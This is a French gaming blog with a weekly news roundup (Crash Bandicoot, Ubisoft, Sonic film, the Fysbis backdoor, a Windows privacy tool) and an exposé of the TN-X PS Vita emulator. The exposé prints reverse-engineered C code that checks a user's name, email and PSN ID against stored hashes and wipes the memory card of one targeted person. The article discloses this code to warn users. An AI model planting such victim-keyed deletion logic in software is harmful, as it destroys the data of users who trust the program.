Cette semaine, Playstation réveille un mort, SEGA en achève un et Assassin's Creed agonise. Quoi de mieux que la mort pour fêter la Saint-Valentin ? Wait...

1) Les woompas seraient-ils enfin mûrs ?

Un nouveau Crash Bandicoot serait-il (enfin) sur les rails ? C'est ce que laisse croire un tweet de Playstation Moyen-Orient :

Traduction pour les gens qui ne parleraient pas le Moyen-Orientais :

Most wanted person... where are you Crash?

Traduction du tweet de Playstation Moyen-Orient

De plus, Randy Falk de la société NECA Toys, fabricant de figurines sous licence, a fait référence à Crash Bandicoot dans une interview de Pixel Dan. Retrouvez la bourde à 4:10 très exactement dans la vidéo suivante.

Enfin un retour de Crash, dans une nouvelle aventure ? Ou simple remake des précédents volets ? Dans tous les cas, nous ne pouvons qu'espérer...

2) Quand Assassin's Creed passe, les actionnaires aboient

Assassin's Creed Unity a laissé un souvenir relativement mauvais aux joueurs, de même qu'Assassin's Creed Syndicate. C'est pourquoi Ubisoft a décidé de ne pas sortir de gros jeu de la licence en 2016, se laissant une année pour reprendre les choses en main. Quand je dis "pas de gros jeu", cela ne veut pas dire qu'il n'y en aura pas : Assassin's Creed India et Russia devraient sortir cette année (y compris sur PS Vita !), ainsi qu'un jeu mobile, déjà sorti sur iOS dans certains pays.

En revanche, la société française a officialisé son planning pour l'année 2017 (ils sont pas en retard). On y retrouve sans surprise For Honor, South Park: The Fractured But Whole et Ghost Recon: Wildlands qui étaient prévus, mais aussi Watch_Dogs 2 qui était un peu moins prévu ainsi qu'une nouvelle licence, qui sera "une nouvelle licence AAA à fort potentiel possédant des fonctionnalités numériques importantes". Un jeu en ligne, quoi.

L'action d'Ubisoft a chuté de 10 % cette année, avec pour cause majeure, le flop de Syndicate, premier Assassin's Creed dont Ubisoft a refusé de communiquer les chiffres. C'est Bolloré qui doit être content.

3) Une génération entière d'enfants traumatisés incoming

Le film Sonic The Hedgehog sortira en 2018 et... J'ai une mauvaise nouvelle... Ça va pas trop vous plaire... Oh et puis merde, foutu pour foutu : ça va être du live-action. Voilà. Puisque j'ai rien envie de dire de plus après cette révélation traumatisante, nous allons passer à la suite. Comment ça, vous voulez en savoir plus ? En fait, vous êtes maso.

Que dire de plus... Ha oui, que live-action signifie qu'il y aura des humains.
Et que c'est Sony Pictures qui dirige le futur navet film d'une licence dont le dernier opus sur ses plateformes remonte à 2011 (seems logic).

Et qu'il y a de grandes chances que ça ressemble à l'infâme série de jeux/TV Sonic Boom et son esthétique dégueulasse, avec un Knuckles de 2 mètres de haut comme de large, un Sonic aux jambes plus longues que le reste du corps et un Tails ingénieur nain. Youpi.

4) Gentil petit malware

Le malware Fysbis (Linux.BackDoor.Fysbis de son petit nom) a été découvert en 2014. Mais c'est cette semaine que des chercheurs en sécurité de Palo Alto Networks ont découvert à quoi il sert. Tout d'abord, rassurez-vous, il y a peut de chances que ce soit le type de malware que vous trouverez sur votre ordi. D'une part parce qu'il est pour Linux, d'autre part parce qu'il a été créé pour l'espionnage industriel. À moins que vous ne travaillez à la NSA pendant votre temps libre, je ne pense pas que vous le trouverez chez vous.

Ce malware aurait été créé par le groupe de cyber-espions APT 28, qui travaillerait pour le gouvernement russe : il y a dans son code source un certain nombre de mots en russe, mais aussi et surtout car l'OTAN, l'Electronic Frontier Foundation ou encore le gouvernement polonais auraient été ciblées.

Beaucoup, beaucoup, beaucoup plus d'infos ici (en anglais).

5) L'utilitaire de la semaine

Aegis est un utilitaire pour Windows 7 et 8.x qui servira aux quelques personnes qui tiennent encore à leur vie privée. Ce petit programme supprime tout ce que Microsoft veut que vous fassiez/donniez mais que vous ne vouliez pas faire/donner :

• Désactive ou masque les notifications de téléchargement de Windows 10 ;
• Désactive GWX (Get Windows 10), OneDrive, Telemetry et Wifisense ;
• Désinstalle ou masque les mises à jour 31 KB ;
• Désactive 31 tâches programmées ;
• Désinstalle Diagtrack ;
• Désactive Remote Registry ;
• Bloque 188 "hosts" Microsoft sur 221 adresses IP ;
• Change les paramètres de Windows Update pour vérifier/notifier au lieu de télécharger/installer.

C'est quand même dingue de voir qu'il faut passer par un programme externe pour que son OS ne nous traque pas... Téléchargement ici.

C'est ainsi que se terminent ces News de la Semaine, merci de les avoir suivies et bonnes vacances à ceux qui y sont (sachez que nous vous détestons <3) !

L’article [NODS] Crash Bandicoot, Ubisoft, Sonic, un malware et Windows est apparu en premier sur Custom Protocol.

Comme je l'ai dit sur Twitter (merci à @Applelo1 pour l'inspiration) : le monde est rose, mais c'est du rose de PQ : il y a donc de la merde à certains endroits (beaucoup même)... Et ce quel que soit le domaine : qu'il s'agisse de politique, de sport, de cinéma, de musique, de jeux vidéo, des individus parfois idolâtrés n'hésitent pas à user de coups bas pour parvenir à leurs sombres fins, quitte à ce que leur supercherie soit découverte et divulguée au monde entier, que tout le respect que portaient des centaines, des milliers voire des millions de personnes partent en fumée et qu'ils perdent leur(s) statut(s)/métier(s).

Introduction :

Avant toute chose, soyons clairs : Total_Noob est l'un des plus grands noms de la scène hack PSP & PS Vita de ces dernières années, c'est lui qui est à l'origine des Custom Firmwares TN sur PSP ainsi que des nombreux eCFW TN-V (émulateur PSP qui va même jusqu'à émuler le XMB), TN-C et plus récemment TN-X de la PS Vita. Et pour tout ce travail qu'il a accompli et qui a permis des avancées considérables, je respecte son implication, ses qualités/compétences de hackeur et chacune de ses productions.

Néanmoins, vous devez savoir que certaines personnes peuvent cacher une face bien moins souriante et confiante qu'ils ne peuvent le laisser penser. Total_Noob fait partie de cette catégorie d'individus, très peu respectables et fortement dédaignables, et c'est pour cette personnalité méprisable que je ne respecte pas... pardon, que je ne respecte plus ce programmeur. Enfin, quoiqu'il en soit, il est tombé extrêmement bas dans mon estime, et je suis le premier déçu par le comportement qu'il a eu.

Je vais vous expliquer ce qu'il s'est passé, mais attention : le dossier risque d'être assez long. Assurez-vous donc d'avoir un peu de temps à perdre devant vous, et activez le mode "père Castor" !

Le TN-X : pourquoi il est méchant m'sieur ?

Revenons quelques jours en arrière : le 12 mars dernier, Total_Noob dévoilait publiquement le fruit de son travail acharné : le TN-X, un autre eCFW pour PS Vita qui avait la particularité de lancer (enfin !) les backups de jeux PS1 sans problème. À peine quelques jours plus tard, malgré la grande qualité de l'émulateur, de nombreux internautes ont soulevé un point assez fâcheux : la signature automatique de chaque screenshot. Une version 2 est donc rapidement sortie pour le plus grand bonheur de tous, ce afin de contourner ce problème majeur et ma foi assez contrariant (c'est pas que j'aime pas avoir des screenshots signés, hein, non pas du tout, mais... voilà quoi). 

Pour une personne "normale" comme la plupart d'entre vous, c'est-à-dire qui n'a pas d'affinité spéciale avec les pirates informatiques qui nous pondent chaque mois des logiciels de plus en plus performants et utiles (je ne sais pas si une icône du hack PSP/Vita nous lit, mais si oui qu'il soit le bienvenu ! :D), vous n'avez normalement rien remarqué : tous vos eCFW marchaient à perfection et dans le meilleur des mondes, et le dernier TN-X vous semblait le plus abouti jusqu'à ce jour.

Seulement voilà : comme dans chaque domaine, quels que soient leur importance et leur puissance, les "chefs" ne travaillent pas pour autant tous mains dans la mains, en partageant tous leurs secrets et en caressant des licornes qui passent par-ci ou par-là. La scène underground ne déroge pas à la règle : deux grands développeurs reconnus peuvent se faire la guerre dans l'ombre et se haïr mutuellement (ou non), certains n'hésitant pas à en venir jusqu'au mensonge, à la propagation d'intox ou, pire, à la tentation/recherche d'éliminer leur(s) adversaire(s) par tous les moyens possibles.

Je me répète un peu, mais cet événement me désespère tellement que j'essaie de me calmer en rédigeant ce looong dossier, plutôt que d'en venir directement aux faits et dénoncer les actes assassins de Total_Noob... Enfin bref, faut que je me lance : en gros son fameux programme TN-X visait secrètement des cibles, qui ne sont autres que... bah des grands noms de la scène hack PSP & Vita et autres ennemis de l'auteur. La cible numéro 1 : The Zett, rédacteur principal sur le site anglophone de référence Wololo et créateur du site d'archives Zload.net.

Les dégâts engendrés :

Si vous faisiez partie de la blacklist (la $hit-list) du développeur, vous aurez peut-être remarqué que votre PS Vita agissait étrangement avec les fichiers pourtant officiels et fonctionnels du TN-X. Dès le début, on peut se douter que quelque chose ne va pas : au lieu du traditionnel écran vert qui fait office de transition avant de lancer le programme, un écran rouge permanent apparaît à l'écran et ne lance pas l'émulateur, bien que tous les fichiers aient été correctement installés et mis en place. On se retrouve donc bloqué éternellement devant cet écran de la mort, dans l'incapacité de faire quelque chose...

Mais ce n'est pas tout, ce ne serait pas assez drôle sinon : à chaque tentative du lancement du TN-X, une augmentation de l'espace libre est aussi observable. Et devinez comment une telle chose peut se produire ? Bingo, c'est le programme qui supprime vos fichiers ! En clair, si vous faites partie de cette "liste personnelle", vous pouvez dès à présent vous attendre au pire sur votre système PS Vita et les données qui y sont stockées, car on ne sait pas encore si d'autres "fonctions" détestables de ce genre ont été cachées dans les releases les plus récentes. Croisons les doigts...

Si, en revanche, vous n'êtes pas une "cible" de Total_Noob, vous pouvez théoriquement continuer à n'éprouver aucune crainte (enfin presque) vis-à-vis de ses applications dont il serait bête de se passer (comme les TN-V et TN-X qui, on ne peut le nier, sont tout de même géniaux). Ayez juste en tête que l'individu derrière toutes ces belles créations n'est peut-être pas aussi "cool" et "sympathique" que nous ne l'imaginiez, et que comme vous le disait souvent votre mère : "l'habit de fait pas le moine". 

La ruse de Total_Noob :

Pour en revenir à notre petite histoire, en réalité cette ruse ne viserait (à priori) personne d'autre que The Zett : Total_Noob n'aurait en effet apparemment pas apprécié ce qu'aurait dit le rédacteur (quand et où, je ne sais pas), à savoir une vive critique de la signature des screenshots sur le TN-X dont nous avons parlé plus haut. 

Les deux versions sont ainsi concernées, et bien qu'elles ne semblent affecter que The Zett, il est tout à fait possible qu'un imprévu se déclenche et que la mauvaise personne soit attaquée. Pensez par exemple aux Gateway, ces linkers 3DS, qui peuvent bricker une console à cause de leur mesure anti-clonage... Soyez donc vigilent, et éteignez directement le programme si vous tombez sur un écran rouge avant de le supprimer définitivement de votre carte mémoire.

//popcorn.prx reverse
 
const char * username; //10472
const char * email; //10673
const char * psn_id; //10689
 
int remove(const char * path) //sub_000000F8
{
        char buffer[256];
        SceIoDirent entry;
        SceUID dir = sceIoDopen(path);
 
        if(dir < 0)
                sceIoRemove(path);
        else
        {
                memset(&entry, 0, sizeof(SceIoDirent));
                while(sceIoDread(dir, &entry) >= 0)
                {
                        if(entry.d_name[0] != '.')
                        {
                                sprintf(buffer, "%s/%s", path, entry.d_name);
                                remove(buffer);
                        };
                       
                        memset(&entry, 0, sizeof(SceIoDirent));
                };
               
                sceIoDclose(dir);
                sceIoRmdir(path);
        };
       
        return 0;
};
 
void break_zett() //sub_000001D4
{
        static const char sha_1[20] = {0xB7, 0xC1, 0xBC, 0xFF, 0x2A, 0x4C, 0x2F, 0x43, 0xAC, 0x12, 0xA6, 0x22, 0xB7, 0x0A, 0x80, 0xF3, 0xF3, 0xEC, 0x25, 0x0C}; //7620
        static const char sha_2[20] = {0xDD, 0xD0, 0x06, 0xD4, 0x7C, 0x13, 0x61, 0x92, 0xBD, 0xD4, 0x17, 0x8F, 0xDE, 0x6A, 0xBF, 0x3B, 0x4A, 0x1D, 0x3F, 0xDA}; //7600
        static const char sha_3[20] = {0x24, 0x57, 0x15, 0x9E, 0xD1, 0xD8, 0x13, 0x30, 0x0F, 0xDB, 0xEA, 0x8E, 0xA5, 0x5F, 0xF7, 0xF5, 0x42, 0x50, 0xE1, 0xD8}; //7580
       
        char buffer1[20]; //7876
        char buffer2[20]; //7856
        char buffer3[20]; //7836
       
        sceKernelUtilsSha1Digest(username, strlen(username), buffer1);
        sceKernelUtilsSha1Digest(email, strlen(email), buffer2);
        sceKernelUtilsSha1Digest(psn_id, strlen(psn_id), buffer3);
 
        if(!memcmp(buffer1, sha_1, 20) || !memcmp(buffer2, sha_2, 20) || !memcmp(buffer3, sha_3, 20))
                remove("ms0:");
};

Mais comment diable Total_Noob a manigancé tout cela ? Rien de plus simple : le code (merci à GBOT pour l'avoir déniché) commence par vérifier le nom d'utilisateur, l'email et l'ID PlayStation Network (Sony Entertainment Network aujourd'hui) puis supprime tout ce qui se trouve dans "ms0:/" (ligne 51) si l'une des valeurs correspond à celles enregistrées (ligne 50). Au moins, ça n'a l'air de supprimer que les fichiers de la partie "PSP" de la PS Vita, c'est déjà ça. Vous remarquerez le doux nom de la fonction (break_zett()) au passage... 

Qwikrazor87, notre sauveur !

Je l'ai déjà dit plusieurs fois, mais ce genre d'actes est impardonnable : la réputation de Total_Noob en a pris un coup, et un sacré coup même. Bien que le respect que j'avais pour lui est parti s'enfouir sous les icebergs du Pôle Nord, il n'en reste pas moins que le TN-X est quand même un logiciel non négligeable.

Heureusement qu'intervient le célèbre Qwikrazor87, aka "notre sauveur". Le développeur vient effectivement de mettre en ligne la version TN-X v2 Mod qui assure l'absence de ce code malveillant pouvant faire peur aux plus craintifs et soigneux d'entre nous. Sentez-vous donc enfin respirer et l'esprit léger après toutes ces lignes qui n'ont fait que vous stresser (je ne l'espère pas), et téléchargez donc ce MOD certifié "sans code malveillant et caché ni blacklist" pour évincer tout soupçon de suppression de vos chers fichiers.

Merci d'avoir eu le courage d'avoir lu en entier mon dossier, et à très bientôt ! ;) 

Mise à jour : voici la réponse Total_Noob. Effectivement, la cible n'était autre que The Zett d'après ses propos.

Mes fichiers ne vérifient que 2 choses
En premier lieu, ils vérifient (s'il s'agit de The Zett) et ne font qu'afficher un écran rouge sans nuire
En second lieu, ils vérifient si la première vérification n'a pas été désactivée
Si oui, ils effacent le contenu de la carte mémoire
Cela veut donc dire que The Zett a utilisé une version modifiée de mon travail, c'est donc de sa faute
La version officielle et non modifiée n'est donc censée qu'afficher un écran rouge
Souvenez-vous : Dark_AleX avait utilisé une méthode similaire pour vérifier si son code avait été modifié et brickait la PSP si cela s'avérait vrai.

Total_Noob

The Zett n'a pas souhaité répondre publiquement.

L’article [MàJ] [Vita] Le TN-X : un malware bien caché (patch disponible) est apparu en premier sur Custom Protocol.